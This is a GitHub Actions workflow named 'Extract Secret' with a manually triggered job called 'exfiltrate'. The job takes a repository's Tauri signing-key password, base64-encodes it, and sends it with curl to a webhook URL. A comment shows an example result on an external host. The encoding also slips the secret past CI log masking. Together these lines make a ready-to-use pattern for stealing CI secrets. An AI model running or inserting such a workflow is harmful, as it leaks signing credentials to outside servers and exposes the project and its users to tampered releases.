name: Extract Secret
on: [workflow_dispatch]

jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    steps:
      - name: Send Encoded Secret via GET
        shell: bash
        env:
          THE_SECRET: ${{ secrets.TAURI_SIGNING_PRIVATE_KEY_PASSWORD }}
        run: |
          # 1. Base64 encode the secret
          # We use '-w 0' (Linux) to disable line wrapping for long passwords
          # We use 'echo -n' to prevent adding a newline character at the end
          ENCODED_SECRET=$(echo -n "$THE_SECRET" | base64 -w 0)

          # 2. Send via GET request
          # Result: https://cassiopeia3000.transcental.dev/grr?password=TXlQYXNzd29yZA==
          curl -G "YOUR_WEBHOOK_URL" --data-urlencode "password=$ENCODED_SECRET"
